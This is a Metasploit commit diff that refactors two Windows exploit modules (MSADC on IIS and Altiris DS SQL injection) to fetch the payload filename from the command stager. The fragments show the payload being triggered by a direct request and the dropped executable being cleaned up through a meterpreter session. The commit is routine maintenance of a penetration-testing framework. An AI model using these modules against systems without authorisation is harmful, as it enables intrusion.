Land rapid7#4324, payload_exe rightening.

Fixes rapid7#4323, but /not/ rapid7#4246.

Author: Tod Beardsley

modules/exploits/windows/iis/msadc.rb

@@ -332,12 +332,12 @@ def exploit
 
       # Save these file names for later deletion
       @exe_cmd_copy = exe_fname
-      @exe_payload = payload_exe
+      @exe_payload = stager_instance.payload_exe # Grab this info from CmdStagerTFTP
 
       # Just for good measure, we'll make a quick, direct request for the payload
       # Using the "start" method doesn't seem to make iis very happy :(
       print_status("Triggering the payload via a direct request...")
-      res = send_request_raw({ 'uri' => '/scripts/' + payload_exe, 'method' => 'GET' }, 1)
+      res = send_request_raw({ 'uri' => '/scripts/' + stager_instance.payload_exe, 'method' => 'GET' }, 1)
     end
 
     handler

modules/exploits/windows/misc/altiris_ds_sqli.rb

@@ -163,7 +163,7 @@ def exploit
   end
 
   def on_new_session(client)
-    return if not payload_exe
+    return if not stager_instance.payload_exe
 
     #can't scrub dropped payload while the process is still active so...
     #iterate through process list, find our process and the associated
@@ -174,7 +174,7 @@ def on_new_session(client)
     #SeeRM#8365 https://http://dev.metasploit.com/redmine/issues/8365
 
     unless client.type == "meterpreter"
-      print_error("Automatic cleanup only available with meterpreter, please delete #{payload_exe} manually")
+      print_error("Automatic cleanup only available with meterpreter, please delete #{stager_instance.payload_exe} manually")
       return
     end
 
@@ -191,7 +191,7 @@ def on_new_session(client)
     end
 
     win_temp = client.sys.config.getenv('TEMP')
-    win_file = "#{win_temp}\\#{payload_exe}"
+    win_file = "#{win_temp}\\#{stager_instance.payload_exe}"
     print_status("Attempting to delete #{win_file} ...")
     client.shell_command_token(%Q|attrib.exe -r #{win_file}|)
     client.fs.file.rm(win_file)